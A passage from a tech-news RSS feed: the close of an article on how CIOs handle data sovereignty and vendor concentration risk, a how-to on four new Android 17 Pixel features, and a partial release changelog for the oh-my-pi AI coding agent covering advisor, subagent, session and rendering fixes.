<p>As geography becomes a constraint, resilience is replacing efficiency as the primary design goal. Enterprises are rethinking their dependence on a small number of global providers, particularly hyperscalers. While companies such as AWS, Microsoft, and Google remain central to most IT strategies, CIOs are increasingly wary of <a href="https://www.cio.com/article/4146639/ai-is-coming-for-your-office-productivity-suite-too.html?utm=hybrid_search">concentration risk</a>.</p>



<p>“Vendor concentration is now treated as systemic risk, not strategic leverage,” Pinto says. Rather than abandoning hyperscalers, organizations are intentionally fragmenting their portfolios. Global providers are retained for standardized, low-risk workloads, while regional or sovereign alternatives are introduced for more sensitive applications.</p>



<p>According to Jaser, many organizations are now discovering how deeply earlier cloud consolidation decisions constrained their flexibility. “A lot of companies optimized everything for a single cloud provider in terms of technology, skills, and planning,” he says. “Then they realized they had three- or five-year contracts with commitments, which limits the ability to choose something else.”</p>



<p>Babin points to emerging risks that go beyond compliance. In some regions, even data centers are becoming potential targets in geopolitical conflicts. “CIOs now have to think about where their AI models are running and what risks exist in those locations,” he says.</p>



<p>The result is a more resilient, albeit splintered, sourcing model — one designed to preserve optionality if geopolitical, regulatory, or vendor conditions change.</p>



<h2 class="wp-block-heading">3. Classify workloads by sovereignty and risk profile</h2>



<p>If resilience requires diversification, it also requires precision. Not every workload needs the same level of protection. That’s where a more granular approach to sovereignty is emerging. Rather than treating it as a binary choice — sovereign or not — CIOs are increasingly thinking in terms of a spectrum.</p>



<p>“It’s not a black-and-white conversation,” Jaser says. “It depends on the workload, its relevance, and the specific sovereignty requirements attached to it.”</p>



<p>In practice, that means classifying workloads based on risk, sensitivity, and business impact. Highly sensitive data such as HR, security, or proprietary AI models may need to remain in tightly controlled environments, whether in sovereign clouds or on-prem infrastructure. Less sensitive applications like marketing systems or public-facing services can continue to run in global cloud environments.</p>



<p>This workload-based approach allows CIOs to balance competing priorities of cost, performance, regulatory compliance, and <a href="https://www.cio.com/article/4135922/what-ax-can-do-to-deliver-cohesion-and-uniformity-to-ai-agents.html?utm=hybrid_search">UX</a>. It also reflects a more mature understanding of sovereignty as a set of trade-offs rather than an absolute goal.</p>



<p>Jaser also argues that CIOs should avoid overcomplicating the process. “Don’t over-engineer it,” he says. “Just start classifying your workloads and move to relevant things.”</p>



<p>Bell argues that most enterprise data don’t require the same level of protection. “More than 90% of enterprise data can safely sit in the public domain,” she says. “There’s really a small percentage that represents the keys to the castle and needs to be protected.”</p>



<h2 class="wp-block-heading">4. Build portability and exit into every layer of the stack</h2>



<p>As organizations distribute workloads across multiple clouds, sovereign environments, and regional providers, the ability to move workloads becomes critical.</p>



<p>Designing for workload portability upfront is becoming increasingly important, Bell says, and that flexibility becomes a critical requirement, not just for optimization.”</p>



<p>Technically, this is driving greater adoption of open standards, containerization, and orchestration platforms such as Kubernetes. These technologies make it easier to shift workloads between environments, whether across cloud providers or between <a href="https://www.cio.com/article/4159281/neglecting-the-cloud-good-luck-with-ai.html?utm=hybrid_search">cloud</a> and on-prem systems.</p>



<p>Contractually, CIOs are pushing for stronger exit clauses, price protections, and flexibility. According to Pinto, organizations are increasingly embedding exit by design into their sourcing strategies since if contracts don’t allow for rapid disengagement, they may find themselves locked into environments that no longer meet regulatory or operational requirements.</p>


<div class="extendedBlock-wrapper block-coreImage left"><figure class="wp-block-image alignleft size-1240-r3:2 is-resized"> width="1240" height="827" sizes="auto, (max-width: 1240px) 100vw, 1240px"&gt;<figcaption class="wp-element-caption"><p>Shannon Bell, OpenText</p>
</figcaption></figure><p class="imageCredit">OpenText</p></div>



<p>The goal isn’t constant movement, but optionality. CIOs want the ability to adapt as conditions change. “The mistake some CIOs make is trying to have an extreme amount of portability, or not enough portability,” Bell says. “The magic is in the middle.”</p>



<h2 class="wp-block-heading">5. Extend sovereignty thinking to the edge and endpoints</h2>



<p>While much of the sovereignty discussion focuses on cloud infrastructure, risk doesn’t stop at the data center but extends to how data is accessed, particularly in a world of remote work and mobile devices. That’s where a less visible but increasingly important dimension of the problem is emerging.</p>



<p>“The business transcends borders, but your data can’t always do the same,” Stern says.</p>



<p>As employees travel and work remotely, sensitive data may be accessed across jurisdictions in ways that violate local regulations. Devices can also be inspected or seized at borders, creating additional exposure. As a result, some organizations are rethinking the model entirely, focusing less on securing devices and more on controlling access to data.</p>



<p>Stern argues that AI and distributed workforces are changing the nature of enterprise security itself. “Identity is now becoming the perimeter,” he says. “It’s not device-centric anymore but identity-centric.”</p>


<div class="extendedBlock-wrapper block-coreImage left"><figure class="wp-block-image alignleft size-1240-r3:2 is-resized"> width="1240" height="827" sizes="auto, (max-width: 1240px) 100vw, 1240px"&gt;<figcaption class="wp-element-caption"><p>Matt Stern, Hypori</p>
</figcaption></figure><p class="imageCredit">Hypori</p></div>



<p>This shift reflects a broader reality that sovereignty is more about who can access data, from where, and under what conditions rather than just about where it’s stored.</p>



<h2 class="wp-block-heading">From cost optimization to continuous risk management</h2>



<p>Taken together, these changes point to a broader transformation in the <a href="https://www.cio.com/article/4126383/how-the-growing-ai-workforce-is-changing-the-cio-role.html?utm=hybrid_search">CIO role</a>. Technology strategy is about managing a dynamic set of risks for the long term that spans regulation, geopolitics, supply chains, and security, not just delivering capability at the lowest cost.</p>



<p>“This isn’t solely the responsibility of the CIO,” says Babin. “The executive team and the board need to understand the trade-offs.” In many cases, achieving greater control and adaptability requires additional costs, slower deployment, or reduced access to cutting-edge features.</p>


<div class="extendedBlock-wrapper block-coreImage left"><figure class="wp-block-image alignleft size-1240-r3:2 is-resized"> width="1240" height="827" sizes="auto, (max-width: 1240px) 100vw, 1240px"&gt;<figcaption class="wp-element-caption"><p>Ron Babin, Toronto Metropolitan University</p>
</figcaption></figure><p class="imageCredit">Toronto Metropolitan University</p></div>



<p>As organizations adapt, CIOs are building strategies that are more complex but also more resilient. According to Pinto, the organizations best positioned for this shift will be those that treat geopolitics as a permanent design constraint not a source of temporary disruption.</p>



<p>That requires a different mindset around operational readiness and risk management. “Being risk ready is about understanding, mitigating, and managing risk in real time,” says Bell.</p>



<p>For CIOs, sovereignty is no longer a niche compliance issue. It’s becoming a core design principle shaping how technology is sourced, deployed, governed, and secured.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Got a Google Pixel? Find these 4 Android 17 features ASAP]]></title>
<description><![CDATA[Well, hey, how ’bout that? Here we are, on a random quiet-seeming week in June, and a new Android version is officially making its way into the wild and onto our favorite Googley gizmos.



Yes, indeed: Google announced the launch of Android 17 this week, and the rollout is getting underway as we...]]></description>
<link>https://tsecurity.de/de/3604338/it-nachrichten/got-a-google-pixel-find-these-4-android-17-features-asap/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3604338/it-nachrichten/got-a-google-pixel-find-these-4-android-17-features-asap/</guid>
<pubDate>Wed, 17 Jun 2026 12:02:51 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Well, hey, how ’bout that? Here we are, on a random quiet-seeming week in June, and a new <a href="https://www.computerworld.com/article/1714347/android-versions-a-living-history-from-1-0-to-today.html">Android version</a> is officially making its way into the wild and onto our favorite Googley gizmos.</p>



<p>Yes, indeed: Google <a href="https://blog.google/products-and-platforms/platforms/android/android-17-features" target="_blank" rel="noreferrer noopener">announced the launch of Android 17</a> this week, and the rollout is getting underway as we speak. As usual, the software will show up for current, still-supported Pixel devices right away, over the next few to several days. (As for everyone else — well, you know the drill by now, right? It’s up to each individual Android device-maker to process and send out its software updates, and outside of Pixels, that support is <a href="https://www.computerworld.com/article/4103529/android-16-upgrade-report-card-2.html">exasperatingly unreliable</a>. But odds are, if you aren’t palming a Pixel, you’ll be waiting for a while — maybe even a <em>long </em>while, <a href="https://www.computerworld.com/article/4177363/motorola-android-phones.html">if you have a phone by a certain manufacturer whose name rhymes with Boatorola</a>.)</p>



<p>As always, some of Android 17’s most important elements are the under-the-hood <a href="https://blog.google/security/whats-new-in-android-security-privacy-2026/">privacy, security, and performance enhancements</a> that you won’t explicitly see but that <em>will </em>make a critical difference in your device’s ability to operate efficiently and advisably. But this latest Android release also packs an impressive punch of interesting surface-level touches that’ll bring an instant boost to your day-to-day productivity and all-around Android-enjoying experience.</p>



<p>As is often the case, many of the most useful elements are things you might not ever even notice or think to tap into if you don’t know where to look.</p>



<p>Here are the four Android 17 features I’ve found most noteworthy so far and how <em>you</em> can start putting ’em to use this second.</p>



<p><strong>[Psst: Don’t let the learning stop here. Check out </strong><a href="https://theintelligence.com/pixel-academy-ai/" target="_blank" rel="noreferrer noopener"><strong>my free Pixel Academy e-course</strong></a><strong> to discover all sorts of advanced intelligence lurking within whatever Pixel you’re using!]</strong></p>



<h2 class="wp-block-heading"><strong>Android 17 Pixel feature #1: Bubbles multitasking magic</strong></h2>



<p>Our first Android 17 addition on its way to Pixel owners this week is something that’s been in the works for many a moon now — and that’s a handy new multitasking mode known as Bubbles.</p>



<p>Bubbles first came into the Android picture <a href="https://www.youtube.com/watch?v=p0lqzzn6OuI">way back in 2019</a>, but at that point, it was limited mostly to messaging and never came close to reaching its full promised potential. At long last, now, Bubbles <a href="https://www.computerworld.com/article/4119364/android-2026-preview.html#:~:text=And%20the%20return%20of%20Android%E2%80%99s%20never-fully-realized%20Bubbles%20system%20for%20keeping%20any%20app%20readily%20available%20on%20your%20screen%20so%20you%20can%20summon%20it%20quickly%20as%20a%20pop-up%20window.">are back</a>, baby, and becoming everything we’d always wanted them to be.</p>



<p>The simplest way to think about Bubbles is as a way to turn any app you’re using into a floating, collapsible window — so you can pull it up on demand when you want it, then minimize it back down into a small icon (a “bubble” — get it?!) to get it out of your hair but keep it nearby for easy ongoing access.</p>



<p>It’s an interesting way to multitask without having to commit to <a href="https://theintelligence.com/37058/android-split-screen-shortcut/" target="_blank" rel="noreferrer noopener">a full-fledged split-screen setup</a>. It can be quite useful for keeping things like lists, documents, emails, chats, or anything else you’re coming back to regularly at your fingertips — so you can pop into it as needed, without any real effort, but also without having it in your face all the time.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/android-17-bubbles.webp" alt="Android 17 Bubbles" class="wp-image-4185801" width="800" height="814" sizes="auto, (max-width: 800px) 100vw, 800px"><figcaption class="wp-element-caption">Android 17’s Bubbles system in action.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>In Android 17, Bubbles is easy to launch with any app in front of you. The only catch is that as of now, at least, it can be triggered only from the standard stock Pixel Launcher — <em>not</em> <a href="https://www.computerworld.com/article/1723954/android-launchers-for-enhanced-efficiency.html">a custom Android launcher</a> like Smart Launcher or Niagara.</p>



<p>Provided you’re using the standard Android home screen setup, though, all you’ve gotta do is:</p>



<ul class="wp-block-list">
<li>Press and hold any app’s icon on your home screen or in your app drawer.</li>



<li>In the menu that pops up, tap the option that says “Bubble.”</li>



<li>Then tap the bubbled app icon to expand or minimize the app, or press and hold it to move it around to any position on your screen or dismiss it.</li>
</ul>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/android-17-bubbles-2.webp" alt="Android 17 Bubbles (2)" class="wp-image-4185805" width="800" height="810" sizes="auto, (max-width: 800px) 100vw, 800px"><figcaption class="wp-element-caption">You can move a bubble anywhere on your screen or dismiss it easily.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>You can also add additional bubbled apps into that same view via the plus icon next to the first app’s icon when a bubble is open. Pretty nifty, wouldn’t ya say?</p>



<h2 class="wp-block-heading"><strong>Android 17 Pixel feature #2: Smarter location access</strong></h2>



<p>Allowing apps access to your location inevitably requires a certain amount of compromise when it comes to <a href="https://www.computerworld.com/article/1620568/ultimate-guide-to-privacy-on-android.html">the ever-prickly subject of privacy</a> — and it demands a certain level of trust that the apps in question won’t abuse the privilege or use it for reasons beyond their intended purposes.</p>



<p>Android 17 makes it meaningfully easier to accept that bargain and rest easy knowing your info isn’t being misused, thanks to a pair of related new privacy protection measures:</p>



<ul class="wp-block-list">
<li>First, whenever any app is accessing your location, you’ll now see a blue dot appear in the upper-right corner of your screen — and if you swipe down once from the top of your screen to open your notification panel, you can actually <em>tap</em> on the location icon that appears in its place to get detailed info about exactly which app or apps are involved. With another tap from there, you can opt to force-close the app in question, view all of its recent location access attempts, and manage its location access ability, too, in case anything ever seems amiss.</li>
</ul>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/android-17-location-indicator.png?w=1024" alt="Android 17 Location Indicator" class="wp-image-4185803" width="1024" height="847" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Android 17 offers some welcome added nuance and power around app location access.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<ul class="wp-block-list">
<li>And second, when an app asks to access your precise location, Android 17 adds in the option to allow such access only temporarily — for that one brief moment and purpose — without giving the app the <em>permanent </em>permission for ongoing use.</li>
</ul>



<p>Hey, we’ll take it. Just remember to keep tabs on <a href="https://www.computerworld.com/article/4183788/google-ai-training-opt-out.html">the permissions Google <em>itself</em> is claiming these days, too</a>, as those <a href="https://www.computerworld.com/article/4183788/google-ai-training-opt-out.html#:~:text=Google%E2%80%99s%20new%20AI%20training%20privacy%20default"><em>don’t</em> always come with a prominent pop-up</a>.</p>



<h2 class="wp-block-heading"><strong>Android 17 Pixel feature #3: More dynamic dark mode</strong></h2>



<p>Dark mode may be one of the <a href="https://theintelligence.com/37270/how-often-do-you-use-androids-dark-mode/" target="_blank" rel="noreferrer noopener">more divisive interface adjustments</a> of our modern mobile moment, but if you’re a fan of the dimmer, less glary view across your Android experience, you’re bound to appreciate the added option Android 17 affords you in that area.</p>



<p>It’s a simple one-tap checkbox that forces apps to adjust and comply with your dark mode preference, when it’s active — even if they don’t natively support such a setting. That means those pesky apps that’d typically maintain the same standard light interface even when you activate dark mode will now turn dark along with the rest of your setup whenever Android’s dark mode is on.</p>



<p>All it takes it quite literally one tap on the freshly added Android 17 option:</p>



<ul class="wp-block-list">
<li>Head into the Display section of your Pixel system settings.</li>



<li>Tap “Dark theme” — the actual <em>words</em>, not the toggle alongside ’em.</li>



<li>And change the setting from “Standard” to “Expanded.”</li>
</ul>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/android-17-dark-theme-expanded.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Android 17 dark theme expanded " class="wp-image-4185802" width="1024" height="842" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Android 17’s “expanded” dark mode setting brings the darkness you crave everywhere.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>Now, one note: By forcing apps to adapt to dark mode even if they aren’t designed for it, it’s possible some programs may end up lookin’ a little funky. If that ever happens and you aren’t thrilled with an app’s adaptation, go back to that same settings screen we were just starin’ at and tap the gear-shaped icon alongside the “Expanded dark theme” option. That’ll let you create exceptions and select specific apps that <em>don’t</em> get dark mode automatically applied.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/android-17-dark-theme-expanded-exceptions.jpg?quality=50&amp;strip=all&amp;w=1010" alt="Android 17 dark theme expanded exceptions" class="wp-image-4185804" width="1010" height="1024" sizes="auto, (max-width: 1010px) 100vw, 1010px"><figcaption class="wp-element-caption">You can create specific exceptions to Android 17’s expanded dark mode approach.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>But everything else will now be in the dark when you want it — just like your dark, brooding heart desires.</p>



<h2 class="wp-block-heading"><strong>Android 17 Pixel feature #4: A more comfy all-around view</strong></h2>



<p>Whether you’re a prince/princess/dutchess/middle-manager of darkness or not, Android 17’s new Comfort View may be just the thing for you.</p>



<p>Comfort View is an off-by-default addition to your Pixel that applies a softer, more pastel-oriented filter to the display with automatic adjustments based on your current viewing environment — in other words, how bright it is around you at any given moment. Ooh, ahh, etc.</p>



<p>To try it out, march your way back into those Display settings, and this time, tap the line labeled “Comfort Filters.” Flip the switch next to “Comfort View,” make sure the “Dynamic” checkbox is active, and see how you feel about your newly optimized screen-color view as you move throughout your day.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/android-17-comfort-view.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Android 17 Comfort View" class="wp-image-4185806" width="1024" height="832" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Android 17’s Comfort View — ahh….comforting.</figcaption></figure><p class="imageCredit">JR Raphael, Foundry</p></div>



<p>If you find the filtering to be too extreme or not enough to make a difference, you can also try disabling the “Dynamic” option there and then manually adjusting the “Intensity” slider to suit your specific peeper preferences. But I suspect if you give it enough time, you’ll find the automatic adjustments to be one of those things that just works for you and makes your device a little easier on the eyes, relative to each and every viewing environment — without being something you actively think about or pay much mind.</p>



<p>That, if you ask me, is the sign of an effective feature. And it’s a welcome addition to Android and the ever-evolving Pixel experience.</p>



<p><em>Don’t let yourself miss an ounce of Pixel magic. </em><a href="https://www.theintelligence.com/pixel-academy-ai/" target="_blank" rel="noreferrer noopener"><strong><em>Come check out my free Pixel Academy e-course</em></strong></a><em> to find tons of hidden features and time-saving tricks for your Googley gizmo.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[v16.0.3]]></title>
<description><![CDATA[@oh-my-pi/pi-ai
Added

Exported renderDelimitedThinking from the @oh-my-pi/pi-ai/dialect barrel so consumers can reuse the dialect's  envelope unwrap-and-rewrap logic (the only ./dialect/rendering primitive re-exported; the rest stay dialect-internal).

Fixed

Fixed OpenAI Responses/Codex tool sc...]]></description>
<link>https://tsecurity.de/de/3603377/tools/v1603/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3603377/tools/v1603/</guid>
<pubDate>Wed, 17 Jun 2026 02:23:16 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>@oh-my-pi/pi-ai</h2>
<h3>Added</h3>
<ul>
<li>Exported <code>renderDelimitedThinking</code> from the <code>@oh-my-pi/pi-ai/dialect</code> barrel so consumers can reuse the dialect's <code>&lt;thinking&gt;</code> envelope unwrap-and-rewrap logic (the only <code>./dialect/rendering</code> primitive re-exported; the rest stay dialect-internal).</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed OpenAI Responses/Codex tool schema normalization stripping provider-rejected regex lookaround patterns from MCP tool parameter schemas. (<a href="https://github.com/can1357/oh-my-pi/issues/2784" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2784/hovercard">#2784</a>)</li>
<li>Fixed OpenAI Responses parallel tool-call routing so late keyed argument deltas for a closed call are dropped instead of being appended to another open call.</li>
</ul>
<h2>@oh-my-pi/pi-coding-agent</h2>
<h3>Added</h3>
<ul>
<li>Added support for LaTeX color commands (<code>\textcolor</code>, <code>\colorbox</code>, and <code>\fcolorbox</code>) in user-visible terminal prose and final chat to colorize output</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Changed STT dependency setup to validate recorder and model assets per <code>stt.modelName</code>, so switching speech models re-runs dependency checks and downloads for the new model</li>
<li>Changed STT startup with cached models to warm the speech model in the background and defer full model loading until transcription begins, reducing push-to-talk start latency</li>
<li>Allowed user-visible terminal and final-chat responses to include LaTeX math delimiters/commands and Mermaid <code>```mermaid</code> diagrams</li>
<li>Changed the hold-<code>Space</code> push-to-talk gesture to recognize a held bar from the <em>regularity</em> of the OS key auto-repeat rather than a raw space count or speed alone, so it no longer spams the editor, no longer eats deliberate space taps, and no longer triggers when the bar is smashed. Recording starts only after two consecutive inter-space deltas are "mechanical" — both fast (within ~120 ms) and near-identical, the metronomic signature of auto-repeat; the few pre-burst spaces typed are then tracked back out. Smashing (fast but jittery) and deliberate spacing (steady but slow) both keep typing real spaces and never start recording.</li>
<li>Updated markdown Mermaid rendering to color ASCII diagrams with the active theme and automatically choose a narrower layout that better fits the terminal width</li>
<li>Made the watched-session transcript sent to the advisor (and shown by <code>/advisor dump</code>) clearer: each turn now opens with a <code>### Session update</code> heading; watched-agent roles render as inline <code>**agent**:</code> / <code>**user**:</code> labels instead of level-2 headings that collided with the advisor's own turns; consecutive same-role messages collapse under one label (the watched agent emits one assistant message per tool call); and batched updates are joined by a blank line rather than a <code>---</code> rule.</li>
<li>Changed the compact transcript tool-intent prefix (<code>history://</code>, <code>/advisor dump</code>) from <code># </code> to <code>// </code> so intent lines read as comments instead of rendering as Markdown H1 headings.</li>
<li>Changed the advisor advice injected into the primary transcript from a <code>Advisor (...): - [severity] note</code> prose block to one <code>&lt;advisory severity="…" guidance="weigh, don't blindly obey"&gt;…&lt;/advisory&gt;</code> element per note, with XML-escaped bodies. (Relocated the shared <code>escapeXmlText</code> helper to <code>@oh-my-pi/pi-utils</code>.)</li>
<li>Reverted <code>/dump</code> and <code>/advisor dump raw</code> to the pre-16.x full verbose dump: system prompt, model/thinking config, tool inventory with parameters, and the message transcript rendered with markdown role headings (<code>## User</code>, <code>## Assistant</code>, <code>### Tool Call: &lt;name&gt;</code> with the call's <code>_i</code> intent as a <code>//</code> comment under the heading and the remaining arguments as a fenced YAML block, <code>### Tool Result: &lt;name&gt;</code>, plus <code>## Bash Execution</code>/<code>## File Mention</code>/summary sections) instead of the model's native-dialect turn envelopes and <code>&lt;invoke&gt;</code>/<code>&lt;parameter&gt;</code> XML tool calls. Dropped the compact default and the <code>[raw]</code> flag on <code>/dump</code>; the compact <code>→ tool(...) ⇒ ok</code> history format is no longer reachable from <code>/dump</code>. <code>/advisor dump</code> still defaults to compact, and <code>/advisor dump raw</code> now renders the same markdown dump (previously the model's native-dialect envelopes).</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fixed Whisper STT cache detection to require both encoder and decoder <code>.onnx</code> files, so partial model downloads now trigger a proper foreground download instead of being treated as fully cached</li>
<li>Fixed same-process <code>JsRuntime</code> cleanup so disposing an older inline/direct runtime no longer deletes a newer runtime's JS helper globals; inactive cmux/direct runtimes now re-activate their globals before sequential use while overlapping cross-runtime runs fail explicitly.</li>
<li>Fixed magic-keyword steering notices (<code>ultrathink-notice</code>, <code>orchestrate-notice</code>, <code>workflow-notice</code>) to be prepended before the related user message so they influence that same turn</li>
<li>Fixed dequeuing or popping queued user messages to remove their preceding hidden magic-keyword notice companions, preventing orphaned queued notices</li>
<li>Fixed queued user steers to auto-resume after interrupts even when the transcript tail is a preserved advisor card or other non-conversational custom message</li>
<li>Fixed queued user follow-up messages to remain queued after an interrupt and only run on explicit resume, even when an IRC wake leaves a provider-valid tail</li>
<li>Fixed stranded IRC asides to wake a response turn after interruption instead of remaining pending</li>
<li>Fixed accepted IRC asides to be flushed into the transcript during disposal instead of being discarded</li>
<li>Fixed interactive submissions made while the TUI had no active input waiter: they now start a real prompt directly, with steer fallback if a background turn races in, instead of queueing behind a non-resumable idle transcript and appearing to do nothing.</li>
<li>Fixed pressing Esc (or Alt+Up dequeue) while agent-authored messages were queued — advisor concern/blocker notes, hidden goal/plan/budget steers, IRC/extension asides — dumping their text into the user's editor. Editor restoration (<code>clearQueue()</code>), pending chips (<code>getQueuedMessages()</code>), and <code>popLastQueuedMessage()</code> now surface only genuinely user-authored queued messages (plain user turns and <code>attribution: "user"</code> custom messages like <code>/skill</code>). Plain Alt+Up dequeue leaves all other queued messages in place for the continuing stream; only the Esc interrupt path keeps just advisor cards (so abort's preservation still re-records them as visible advice) and drops other internal steers, so a user interrupt can't be silently undone by an auto-resume on leftover internal context. <code>queuedMessageCount</code> still reflects all actual queued work (advisor cards included) so <code>hasPendingMessages()</code>/RPC and the empty-submit abort gate stay accurate.</li>
<li>Fixed advisor <code>concern</code>/<code>blocker</code> advice being withheld from the running agent and then dumped as one burst at the next user prompt after a deliberate interrupt. A user interrupt latches advisor auto-resume suppression, but a non-user resume (synthetic/auto-continue, or a queued steer draining after the abort) leaves the run streaming with that latch still set, so every interrupting note was parked hidden in the next-turn queue instead of steered into the live turn — the agent never heard the advisor mid-run and the backlog flushed all at once on the next prompt. Suppression now only withholds interrupting advice while the agent is idle (or still tearing the interrupted turn down); once a turn is streaming again the note is steered in live, since steering an active run never auto-resumes a stopped one. A concern that strands in the steer queue past the resumed turn's final poll is reclaimed as visible advice when the agent settles (mirroring abort), so it neither auto-resumes the stopped run nor lingers to flush at the next prompt.</li>
<li>Fixed <code>omp --continue</code>/<code>-c</code> sometimes resuming into a subagent transcript instead of the interactive session. Subagent (and HTML-export) <code>SessionManager.open()</code> calls run in the parent's terminal and were clobbering the per-TTY <code>--continue</code> breadcrumb with their own artifact-dir session file; these headless opens now suppress the breadcrumb. <code>continueRecent()</code> also recovers already-poisoned breadcrumbs by resolving any session file inside a parent's artifacts dir (<code>&lt;parent&gt;/&lt;agentId&gt;.jsonl</code>) back up to the top-level session.</li>
<li>Fixed the Agent Hub stacking duplicate <code>Agent Hub · N running</code> frames and stranding garbage rows in scrollback while navigating with subagents still streaming. The hub was a non-fullscreen overlay composited over a live transcript, so each time a running subagent's progress grew the frame and scrolled the window the previously-painted hub copy was pushed permanently into the terminal's native scrollback (which the engine can't rewrite). It now renders inline in the editor slot — the same anchored region every other selector and the <code>ask</code> tool use — riding the normal append-only commit path, so the transcript commits above it exactly once and the hub repaints in place instead of leaking copies. (Avoids borrowing the alternate screen.)</li>
<li>Fixed every subagent registering itself as its own parent in the agent registry (<code>parentId === id</code>), so the Agent Hub rendered each agent as <code>sub · of &lt;itself&gt;</code> and the ←← parent-navigation gesture looped on the same agent. The SDK was reusing <code>parentTaskPrefix</code> — the agent's own artifact/output-id prefix — as the registry parent link; spawns now pass a separate <code>parentAgentId</code> (the spawning agent's id: <code>Main</code> for top-level <code>task</code> spawns, the parent subagent for nested spawns and eval <code>agent()</code>, the focused agent for <code>/tan</code>) and the registry records that as the parent.</li>
<li>Fixed messaging a <code>parked</code> subagent that was restored from disk (Agent Hub scan, or a resumed/restarted session) failing with <code>cannot be revived (no reviver registered)</code> even though its transcript was intact. Such refs carry a session file but no in-memory reviver — the executor's live reviver closure dies with the spawning turn/process — so IRC sends and Agent Hub focus refused them. <code>AgentLifecycleManager.ensureLive</code> now cold-revives them through a persisted-subagent reviver factory (installed by the top-level interactive/RPC session) that rebuilds the subagent from its JSONL the way <code>--resume</code> rebuilds a session: it reopens the file and replays it through <code>createAgentSession</code>, but sources the runtime contract from a now-readable <code>session_init</code> record (<code>SessionManager.peekSessionInit</code>) so tools, system prompt, output schema, and kind are restored rather than resurrected as a default top-level session. <code>session_init</code> now also persists the effective <code>spawns</code> allowlist and read-summarization flag so a cold revive keeps the original capability surface (old files without them deny re-spawning rather than defaulting to wildcard). Isolated runs and pre-<code>session_init</code> files whose recorded workspace no longer exists stay transcript-only (<code>history://</code>).</li>
<li>Fixed the terminal window-title OSC writes (<code>setTerminalTitle</code>/<code>pushTerminalTitle</code>/<code>popTerminalTitle</code>) leaking escape sequences to a developer's terminal during <code>bun test</code>; they now skip when the terminal is headless (the test-runtime default), matching the <code>ProcessTerminal</code> render/probe suppression so interactive-mode tests no longer paint to the real terminal</li>
<li>Fixed empty CLI sessions being retained after opening <code>omp</code> and exiting without a prompt (<a href="https://github.com/can1357/oh-my-pi/issues/2800" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2800/hovercard">#2800</a>).</li>
<li>Fixed <code>hooks/pre/*.ts</code> and <code>hooks/post/*.ts</code> files discovered through <code>hookCapability</code> being registered in discovery but never loaded into the extension runner, so their <code>tool_call</code> handlers now run without a manual <code>settings.json</code> <code>extensions</code> entry (<a href="https://github.com/can1357/oh-my-pi/issues/2796" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2796/hovercard">#2796</a>).</li>
<li>Fixed startup model fallback choosing the plain OpenAI <code>gpt-5.5</code> provider before the Codex OAuth provider when both shared the same default model id, which could surface a misleading OpenAI 401 despite valid Codex credentials (<a href="https://github.com/can1357/oh-my-pi/issues/2807" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2807/hovercard">#2807</a>).</li>
<li>Fixed local auto-thinking classification for reasoning-capable tiny models by giving them the same safe answer budget as online reasoning classifiers, with a larger local floor for non-reasoning tiny models (<a href="https://github.com/can1357/oh-my-pi/issues/2808" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2808/hovercard">#2808</a>).</li>
</ul>
<h3>Removed</h3>
<ul>
<li>Removed the built-in <code>render_mermaid</code> tool and its <code>renderMermaid.enabled</code> setting, so it can no longer be invoked directly</li>
</ul>
<h2>@oh-my-pi/collab-web</h2>
<h3>Removed</h3>
<ul>
<li>Removed rendering support for the <code>render_mermaid</code> tool from the web tool registry</li>
</ul>
<h2>@oh-my-pi/pi-tui</h2>
<h3>Added</h3>
<ul>
<li>Added <code>\tfrac</code> support to stacked display-math rendering so it now displays as a vertical fraction in <code>latexToBlock</code> output</li>
